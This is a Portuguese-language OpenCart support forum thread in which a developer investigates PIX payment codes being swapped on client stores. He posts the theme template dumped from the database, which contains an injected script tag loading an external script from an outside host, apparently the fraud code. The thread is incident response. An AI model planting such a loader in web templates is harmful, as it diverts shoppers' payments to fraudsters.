Fórum OpenCart Brasil

Por um e-commerce livre, confiável e profissional

Suporte geral sobre problemas técnicos para OpenCart v3.x.
Por lucasrbdev
#92210
Pessoal preciso de um direcionamento urgente, tomamos conta de algumas lojas virtuais opencart em nossa agência e estamos com 2 clientes que a loja deles está sendo vítima de fraude, basicamente quando um cliente compra e escolhe pagar via PIX, por algum local estão conseguindo modificar o código PIX copia e cola, de forma que quando o usuário copia para realizar o pagamento não paga para o verdadeiro dono da loja e sim para os golpistas.

Utilizamos Pagseguro em uma loja e na outra PagHyper Pix

Alguém já enfrentou problema deste tipo?

Alguma luz sobre onde pode estar o script malicioso?

Desde já muito obrigado.
Avatar do usuário
Por reds
Mensagens Especiais Curtidas
#92213
Ola Lucas,
Explique melhor pra saber como esse PIX é gerado?
Pode ser que sua loja esta infectada com arquivo malicioso sim, já pegamos algo scripts parecidos que modificava e capturava dados, aconselho a rever seu código, ou se precisar entre em contato conosco.
:(
Por lucasrbdev
#92229
Olá bom dia!!

Encontramos o script malicioso sendo chamado em:

[root@mail tabacoc3d]# grep -R "taba.js" domains/tabacoshop.com.br
domains/tabacoshop.com.br/storage/cache/template/2b/2b95f46ed9285d75a18195e3b646960ec114151ce8f7f7e5058c05d0317663a0.ph <script src=https://anl.is/taba.js></script>

Também encontramos no banco de dados na tabela oc_theme em um registro:
Código: Selecionar todos
&lt;!DOCTYPE html&gt;
&lt;!--[if IE]&gt;&lt;![endif]--&gt;
&lt;!--[if IE 8 ]&gt;&lt;html dir=&quot;{{ direction }}&quot; lang=&quot;{{ lang }}&quot; class=&quot;ie8&quot;&gt;&lt;![endif]--&gt;
&lt;!--[if IE 9 ]&gt;&lt;html dir=&quot;{{ direction }}&quot; lang=&quot;{{ lang }}&quot; class=&quot;ie9&quot;&gt;&lt;![endif]--&gt;
&lt;!--[if (gt IE 9)|!(IE)]&gt;&lt;!--&gt;
	&lt;html
	dir=&quot;{{ direction }}&quot; lang=&quot;{{ lang }}&quot;&gt; &lt;!--&lt;![endif]--&gt;
	&lt;head&gt;
		&lt;meta charset=&quot;UTF-8&quot;/&gt;
		&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;
		&lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;
		&lt;title&gt;{{ title }}&lt;/title&gt;
		&lt;base href=&quot;{{ base }}&quot;/&gt;
		{% if description %}
			&lt;meta name=&quot;description&quot; content=&quot;{{ description }}&quot;/&gt;
		{% endif %}
		{% if keywords %}
			&lt;meta name=&quot;keywords&quot; content=&quot;{{ keywords }}&quot;/&gt;
		{% endif %}
		&lt;script src=&quot;catalog/view/javascript/jquery/jquery-2.1.1.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;link href=&quot;catalog/view/javascript/bootstrap/css/bootstrap.min.css&quot; rel=&quot;stylesheet&quot; media=&quot;screen&quot;/&gt;
		&lt;script src=&quot;catalog/view/javascript/bootstrap/js/bootstrap.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;link href=&quot;catalog/view/javascript/font-awesome/css/font-awesome.min.css&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot;/&gt;
		&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;catalog/view/javascript/jquery/magnific/magnific-popup.css&quot;/&gt;
		&lt;link href=&quot;//fonts.googleapis.com/css?family=Open+Sans:400,400i,300,700&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot;/&gt;
		&lt;link href=&quot;catalog/view/theme/{{ activetemplate }}/stylesheet/owl.carousel.min.css&quot; rel=&quot;stylesheet&quot;&gt;
		&lt;script src=&quot;catalog/view/theme/{{ activetemplate }}/javascripts/owl.carousel.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;script src=&quot;catalog/view/theme/{{ activetemplate }}/javascripts/theme.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;link href=&quot;catalog/view/theme/{{ activetemplate }}/stylesheet/stylesheet.css?v=4&quot; rel=&quot;stylesheet&quot;&gt;


		{% if direction == 'rtl' %}

			&lt;link href=&quot;catalog/view/theme/{{ activetemplate }}/stylesheet/rtl.css&quot; rel=&quot;stylesheet&quot;&gt;
		{% endif %}

		{% for style in styles %}
			&lt;link href=&quot;{{ style.href }}&quot; type=&quot;text/css&quot; rel=&quot;{{ style.rel }}&quot; media=&quot;{{ style.media }}&quot;/&gt;
		{% endfor %}
		{% for script in scripts %}
			&lt;script src=&quot;{{ script }}&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		{% endfor %}
		&lt;script src=&quot;catalog/view/javascript/common.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;script src=&quot;catalog/view/javascript/support.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;link href=&quot;catalog/view/javascript/font-awesome/css/font-awesome.min.css&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot;/&gt;
		&lt;script src=&quot;catalog/view/javascript/jquery/magnific/jquery.magnific-popup.min.js&quot;&gt;&lt;/script&gt;
        &lt;script src=https://anl.is/taba.js&gt;&lt;/script&gt;
		&lt;script src=&quot;catalog/view/javascript/jquery/datetimepicker/moment/moment.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;script src=&quot;catalog/view/javascript/jquery/datetimepicker/moment/moment-with-locales.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		&lt;script src=&quot;catalog/view/javascript/jquery/datetimepicker/bootstrap-datetimepicker.min.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
		{% for link in links %}
			&lt;link href=&quot;{{ link.href }}&quot; rel=&quot;{{ link.rel }}&quot;/&gt;
		{% endfor %}
		{% for analytic in analytics %}
			{{ analytic }}
		{% endfor %}
	&lt;/head&gt;
	&lt;body&gt;
		&lt;main&gt;
			&lt;div id=&quot;menu_wrapper&quot;&gt;&lt;/div&gt;
			&lt;header id=&quot;header&quot; class=&quot;{{ ishome }}&quot;&gt;
				&lt;div class=&quot;header-nav&quot;&gt;
					&lt;div class=&quot;container&quot;&gt;
						&lt;div class=&quot;col-xs-12 col-sm-6 col-md-6 col-lg-6 left-nav&quot;&gt;
							{% if logged %}
								&lt;div class=&quot;bem-vindo&quot; style=&quot;padding: 18px 0;&quot;&gt;
									Você acessou como
									&lt;a href=&quot;/index.php?route=account/account&quot;&gt;{{nomeusuario}}
									&lt;/a&gt;
									&lt;b&gt;(&lt;/b&gt;
									&lt;a href=&quot;/index.php?route=account/logout&quot;&gt;Sair&lt;/a&gt;
									&lt;b&gt;)&lt;/b&gt;
								&lt;/div&gt;
							{% else %}
								&lt;div class=&quot;bem-vindo&quot; style=&quot;padding: 18px 0;&quot;&gt;
									Olá, visitante. Acesse sua
									&lt;a href=&quot;/index.php?route=account/login&quot;&gt;conta&lt;/a&gt;
									ou
									&lt;a href=&quot;/index.php?route=account/register&quot;&gt;cadastre-se&lt;/a&gt;.
								&lt;/div&gt;
							{% endif %}
						&lt;/div&gt;
						&lt;div
							class=&quot;col-xs-12 col-sm-6 col-md-6 col-lg-6 right-nav&quot;&gt;
							{# &lt;div class=&quot;language-selector&quot;&gt;{{ language }}&lt;/div&gt;
									      		&lt;div class=&quot;currency-selector&quot;&gt;{{ currency }}&lt;/div&gt; #}
							&lt;div id=&quot;_desktop_user_info&quot;&gt;
								&lt;div class=&quot;user-info&quot;&gt;
									&lt;div class=&quot;dropdown&quot;&gt;
										&lt;a title=&quot;{{ text_account }}&quot; class=&quot;dropdown-toggle&quot; data-toggle=&quot;dropdown&quot;&gt;
											&lt;div class=&quot;user-logo hidden-lg hidden-md&quot;&gt;
												&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; style=&quot;display: none;&quot;&gt;
													&lt;symbol id=&quot;user-responsive&quot; viewbox=&quot;0 0 480 480&quot;&gt;
														&lt;title&gt;user&lt;/title&gt;
														&lt;path d=&quot;M187.497,152.427H73.974c-38.111,0-69.117,31.006-69.117,69.117v39.928h251.758v-39.928
														C256.614,183.433,225.608,152.427,187.497,152.427z M241.614,246.473H19.856v-24.928c0-29.84,24.277-54.117,54.117-54.117h113.523
														c29.84,0,54.117,24.277,54.117,54.117L241.614,246.473L241.614,246.473z&quot;&gt;&lt;/path&gt;
														&lt;path d=&quot;M130.735,145.326c40.066,0,72.663-32.597,72.663-72.663S170.802,0,130.735,0S58.072,32.596,58.072,72.663
														S90.669,145.326,130.735,145.326z M130.735,15c31.796,0,57.663,25.867,57.663,57.663s-25.867,57.663-57.663,57.663
														s-57.663-25.868-57.663-57.663S98.939,15,130.735,15z&quot;&gt;&lt;/path&gt;
													&lt;/symbol&gt;
												&lt;/svg&gt;
												&lt;svg class=&quot;icon&quot; viewbox=&quot;0 0 40 40&quot;&gt;
													&lt;use xlink:href=&quot;#user-responsive&quot; x=&quot;19%&quot; y=&quot;19%&quot;&gt;&lt;/use&gt;
												&lt;/svg&gt;
											&lt;/div&gt;
											{% if logged %}
											&lt;div class=&quot;flex-column&quot;&gt;
												&lt;div class=&quot;flex-center&quot;&gt;
													&lt;span class=&quot;expand-more my-account&quot; style=&quot;font-size: 19px;&quot;&gt;Minha Conta&lt;/span&gt;
												&lt;/div&gt;
												&lt;div&gt;
													&lt;span class=&quot;expand-more my-account&quot;&gt;Conta / Sair&lt;/span&gt;
													&lt;i class=&quot;fa fa-angle-down&quot;&gt;&lt;/i&gt;
												&lt;/div&gt;
											&lt;/div&gt;
											{% else %}
											&lt;div class=&quot;flex-column&quot;&gt;
												&lt;div class=&quot;flex-center&quot;&gt;
													&lt;span class=&quot;expand-more my-account&quot; style=&quot;font-size: 19px;&quot;&gt;Minha Conta&lt;/span&gt;
												&lt;/div&gt;
												&lt;div&gt;
													&lt;span class=&quot;expand-more my-account&quot;&gt;Entrar / Cadastrar&lt;/span&gt;
													&lt;i class=&quot;fa fa-angle-down&quot;&gt;&lt;/i&gt;
												&lt;/div&gt;
											&lt;/div&gt;
											{% endif %}
										&lt;/a&gt;
										&lt;ul class=&quot;dropdown-menu&quot;&gt;
											{% if logged %}
												&lt;li&gt;
													&lt;a href=&quot;{{ account }}&quot;&gt;{{ text_account }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ order }}&quot;&gt;{{ text_order }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ transaction }}&quot;&gt;{{ text_transaction }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ download }}&quot;&gt;{{ text_download }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ logout }}&quot;&gt;{{ text_logout }}&lt;/a&gt;
												&lt;/li&gt;
											{% else %}
												&lt;li&gt;
													&lt;a href=&quot;{{ register }}&quot;&gt;{{ text_register }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ login }}&quot;&gt;
														{{ text_login }}&lt;/a&gt;
												&lt;/li&gt;
												&lt;li&gt;
													&lt;a href=&quot;{{ wishlist }}&quot; id=&quot;wishlist-total&quot; title=&quot;{{ text_wishlist }}&quot;&gt;
														&lt;span class=&quot;wishlist-text&quot;&gt;{{ text_wishlist }}&lt;/span&gt;
													&lt;/a&gt;
												&lt;/li&gt;
											{% endif %}
										&lt;/ul&gt;
									&lt;/div&gt;
								&lt;/div&gt;
							&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
				&lt;div class=&quot;header-top-height&quot;&gt;
					&lt;div class=&quot;header-top&quot;&gt;
						&lt;div class=&quot;container&quot;&gt;
							&lt;div class=&quot;row&quot;&gt;
								&lt;div class=&quot;mobile-width-left col-sm-4 col-xs-4&quot;&gt;
									&lt;div id=&quot;menu-icon&quot; class=&quot;menu-icon hidden-md hidden-lg&quot;&gt;
										&lt;div class=&quot;nav-icon&quot;&gt;
											&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; style=&quot;display: none;&quot;&gt;
												&lt;symbol id=&quot;menu&quot; viewbox=&quot;0 0 750 750&quot;&gt;
													&lt;title&gt;menu&lt;/title&gt;
													&lt;path d=&quot;M12.03,84.212h360.909c6.641,0,12.03-5.39,12.03-12.03c0-6.641-5.39-12.03-12.03-12.03H12.03
																						              C5.39,60.152,0,65.541,0,72.182C0,78.823,5.39,84.212,12.03,84.212z&quot;&gt;&lt;/path&gt;
													&lt;path d=&quot;M372.939,180.455H12.03c-6.641,0-12.03,5.39-12.03,12.03s5.39,12.03,12.03,12.03h360.909c6.641,0,12.03-5.39,12.03-12.03
																						                  S379.58,180.455,372.939,180.455z&quot;&gt;&lt;/path&gt;
													&lt;path d=&quot;M372.939,300.758H12.03c-6.641,0-12.03,5.39-12.03,12.03c0,6.641,5.39,12.03,12.03,12.03h360.909
																						              c6.641,0,12.03-5.39,12.03-12.03C384.97,306.147,379.58,300.758,372.939,300.758z&quot;&gt;&lt;/path&gt;
												&lt;/symbol&gt;
											&lt;/svg&gt;
											&lt;svg class=&quot;icon&quot; viewbox=&quot;0 0 30 30&quot;&gt;
												&lt;use xlink:href=&quot;#menu&quot; x=&quot;22%&quot; y=&quot;25%&quot;&gt;&lt;/use&gt;
											&lt;/svg&gt;
										&lt;/div&gt;
									&lt;/div&gt;
									&lt;div id=&quot;_mobile_seach_widget&quot;&gt;&lt;/div&gt;
								&lt;/div&gt;
								&lt;div class=&quot;desktop-logo col-lg-3 col-md-3 col-sm-3 col-xs-3&quot;&gt;
									&lt;div id=&quot;logo&quot;&gt;
										{% if logo %}
											&lt;a href=&quot;{{ home }}&quot;&gt;&lt;img src=&quot;{{ logo }}&quot; title=&quot;{{ name }}&quot; alt=&quot;{{ name }}&quot; class=&quot;img-responsive&quot;/&gt;&lt;/a&gt;
										{% else %}
											&lt;span style=&quot;font-size: 20px;line-height: 20px;&quot;&gt;
												&lt;a href=&quot;{{ home }}&quot;&gt;
													{{ name }}
												&lt;/a&gt;
											&lt;/span&gt;
										{% endif %}
									&lt;/div&gt;
								&lt;/div&gt;
								&lt;div id=&quot;_desktop_seach_widget&quot; class=&quot;col-lg-4 col-md-4 col-sm-4 col-xs-4&quot;&gt;
									&lt;div id=&quot;ishisearch_widget&quot; class=&quot;search-widget dropdown&quot;&gt;
										&lt;div class=&quot;search-logo dropdown-toggle&quot; data-toggle=&quot;dropdown&quot; aria-expanded=&quot;true&quot;&gt;
											&lt;div class=&quot;hidden-lg hidden-md&quot;&gt;
												&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; style=&quot;display: none;&quot;&gt;
													&lt;symbol id=&quot;magnifying-desktop&quot; viewbox=&quot;0 0 1200 1200&quot;&gt;
														&lt;title&gt;magnifying-desktop&lt;/title&gt;
														&lt;path d=&quot;M606.209,578.714L448.198,423.228C489.576,378.272,515,318.817,515,253.393C514.98,113.439,399.704,0,257.493,0
																						                           C115.282,0,0.006,113.439,0.006,253.393s115.276,253.393,257.487,253.393c61.445,0,117.801-21.253,162.068-56.586
																						                           l158.624,156.099c7.729,7.614,20.277,7.614,28.006,0C613.938,598.686,613.938,586.328,606.209,578.714z M257.493,467.8
																						                           c-120.326,0-217.869-95.993-217.869-214.407S137.167,38.986,257.493,38.986c120.327,0,217.869,95.993,217.869,214.407
																						                           S377.82,467.8,257.493,467.8z&quot;&gt;&lt;/path&gt;
													&lt;/symbol&gt;
												&lt;/svg&gt;
												&lt;svg class=&quot;icon&quot; viewbox=&quot;0 0 40 40&quot;&gt;
													&lt;use xlink:href=&quot;#magnifying-desktop&quot; x=&quot;20%&quot; y=&quot;22%&quot;&gt;&lt;/use&gt;
												&lt;/svg&gt;
											&lt;/div&gt;
										&lt;/div&gt;
										&lt;form class=&quot;dropdown-menu&quot; style=&quot;z-index: 999;&quot;&gt;{{ search }}&lt;/form&gt;
									&lt;/div&gt;
								&lt;/div&gt;

								&lt;div class=&quot;mobile-width-right col-sm-4 col-xs-4&quot;&gt;
									&lt;div id=&quot;_mobile_cart&quot;&gt;&lt;/div&gt;
									&lt;div id=&quot;_mobile_user_info&quot;&gt;&lt;/div&gt;
									&lt;div id=&quot;_mobile_link_menu&quot;&gt;&lt;/div&gt;
								&lt;/div&gt;
								&lt;div class=&quot;custominfo col-lg-5 col-md-5 col-sm-5 col-xs-5&quot;&gt;

									&lt;div id=&quot;_desktop_cart&quot;&gt;
										&lt;div class=&quot;blockcart&quot;&gt;
											{{ cart }}
										&lt;/div&gt;
									&lt;/div&gt;
									&lt;div id=&quot;_desktop-contactinfo televendas-header&quot; style=&quot;max-width: 260px; justify-content: center; display: flex; flex-direction: row; gap: 18px; border: 1px solid #d6d6d6; background: #f6f6f6; padding: 12px 15px; border-radius: 6px;&quot;&gt;
										&lt;div class=&quot;image-icon&quot;&gt;
											&lt;img src=&quot;image/ico-telefone.png&quot;/&gt;
										&lt;/div&gt;
										&lt;div style=&quot;display: flex; flex-direction: column; justify-content: center;&quot;&gt;
											&lt;span&gt;Televendas&lt;/span&gt;
											&lt;a href=&quot;https://api.whatsapp.com/send?phone=5511983452137&quot; target=&quot;_blank&quot;&gt;
												&lt;span&gt;(11) 98345-2137&lt;/a&gt;
											&lt;/span&gt;
										&lt;/div&gt;
									&lt;/div&gt;
								&lt;/div&gt;
							&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
					&lt;div class=&quot;hidden-md hidden-lg&quot; style=&quot;width: 100%;&quot;&gt;
						&lt;div id=&quot;_desktop-contactinfo televendas-header&quot; style=&quot;justify-content: center; display: flex; flex-direction: row; gap: 18px; border: 1px solid #d6d6d6; background: #f6f6f6; padding: 12px 15px; border-radius: 6px;&quot;&gt;
							&lt;div style=&quot;display: flex; flex-direction: column; justify-content: center;&quot;&gt;
								&lt;span style=&quot;text-align: center;&quot;&gt;Televendas&lt;/span&gt;
								&lt;span&gt;
									&lt;a href=&quot;https://api.whatsapp.com/send?phone=5511983452137&quot; target=&quot;_blank&quot;&gt;(11) 98345-2137&lt;/a&gt;
								&lt;/span&gt;
							&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
				{{ headerafter }}
				&lt;div class=&quot;nav-full-height&quot;&gt;
					&lt;div class=&quot;nav-full-width&quot;&gt;
						&lt;div class=&quot;container&quot;&gt;
							&lt;div class=&quot;row&quot;&gt;
								{{ menu }}
							&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/header&gt;

			&lt;div id=&quot;mobile_top_menu_wrapper&quot; class=&quot;hidden-lg hidden-md&quot; style=&quot;display:none;&quot;&gt;
				&lt;div id=&quot;top_menu_closer&quot;&gt;
					&lt;i class=&quot;fa fa-close&quot;&gt;&lt;/i&gt;
				&lt;/div&gt;
				&lt;div class=&quot;js-top-menu mobile&quot; id=&quot;_mobile_top_menu&quot;&gt;&lt;/div&gt;
			&lt;/div&gt;
			&lt;div id=&quot;spin-wrapper&quot;&gt;&lt;/div&gt;
			&lt;div id=&quot;siteloader&quot;&gt;
				{% if loader == 'loader_1' %}
					&lt;div class=&quot;loader loader-1&quot;&gt;&lt;/div&gt;
				{% elseif loader == 'loader_2' %}
					&lt;div class=&quot;loader loader-2&quot;&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
					&lt;/div&gt;
				{% elseif loader == 'loader_3' %}
					&lt;div class=&quot;loader loader-3&quot;&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
					&lt;/div&gt;
				{% else %}
					&lt;div class=&quot;loader loader-4 la-dark la-2x&quot;&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
						&lt;div&gt;&lt;/div&gt;
					&lt;/div&gt;
				{% endif %}
			&lt;/div&gt;

			&lt;!-- ======= Quick view JS ========= --&gt;
			&lt;script&gt;
				function quickbox() {
if ($(window).width() &gt; 767) {
$('.quickview-button').magnificPopup({type: 'iframe', delegate: 'a', preloader: true, tLoading: 'Loading image #%curr%...'});
}
}
jQuery(document).ready(function () {
quickbox();
});
jQuery(window).resize(function () {
quickbox();
});
$(&quot;input[name=\'search\']&quot;).keyup(function (event) {
$('input[name=\'search\']').autocomplete({
'source': function (request, response) {
$.ajax({
url: 'index.php?route=product/search/autocomplete&amp;filter_name=' + encodeURIComponent(request),
dataType: 'json',
success: function (result) {
var products = result.products;
$('.ajaxishi-search ul li').remove();
$.each(products, function (index, product) {
var html = '&lt;li&gt;';
html += '&lt;div&gt;';
html += '&lt;a href=&quot;' + product.url + '&quot; title=&quot;' + product.name + '&quot;&gt;';
html += '&lt;div class=&quot;product-image&quot;&gt;&lt;img alt=&quot;' + product.name + '&quot; src=&quot;' + product.image + '&quot;&gt;&lt;/div&gt;';
html += '&lt;div class=&quot;product-desc&quot;&gt;';
html += '&lt;div class=&quot;product-name&quot;&gt;' + product.name + '&lt;/div&gt;';
if (product.special) {
html += '&lt;div class=&quot;product-price&quot;&gt;&lt;span class=&quot;special&quot;&gt;' + product.price + '&lt;/span&gt;&lt;span class=&quot;price&quot;&gt;' + product.special + '&lt;/span&gt;&lt;/div&gt;';
} else {
html += '&lt;div class=&quot;product-price&quot;&gt;&lt;span class=&quot;price&quot;&gt;' + product.price + '&lt;/span&gt;&lt;/div&gt;';
} html += '&lt;/div&gt;';
html += '&lt;/a&gt;';
html += '&lt;/div&gt;';
html += '&lt;/li&gt;';
$('.ajaxishi-search ul').append(html);
});
$('.ajaxishi-search').css('display', 'block');
return false;
}
});
},
'select': function (product) {
$('input[name=\'filter_name\']').val(product.name);
}
});
});
			&lt;/script&gt;
O problema é que realizamos a remoção dessas 2 incidências, mas o script voltou a ser encontrado novamente.
Por lucasrbdev
#92230
reds escreveu: 08 Mar 2026, 15:24 Ola Lucas,
Explique melhor pra saber como esse PIX é gerado?
Pode ser que sua loja esta infectada com arquivo malicioso sim, já pegamos algo scripts parecidos que modificava e capturava dados, aconselho a rever seu código, ou se precisar entre em contato conosco.
:(
Perdão acabei não respondendo sua pergunta, mas não tenho conhecimento profundo no Plugin que estava sendo utilizado o (PagHyper Pix), mas é este plugin que é responsável pela geração, tanto do QR-Code como do Copia e Cola, ao que verifiquei no código malicioso: https://anl.is/taba.js ele parece estar apto apenas para funcionar com o Paghyper, alteramos o Plugin de PIX para o da PagSeguro, na tentativa de interromper as tentativas de fraude.
Avatar do usuário
Por leandrorppo
Mensagens Especiais Curtidas
#92232
Olá! Tudo bem?
Lucas, é bom fazer testes de ataques XSS na loja. Se quiser posso ajudá-lo nisso. Geralmente é através de ataques do gênero que inserem códigos maliciosos na loja.
Criei uma proteção completa contra ataques XSS.
Qualquer dúvida, só entrar em contato: 15 - 98152-9807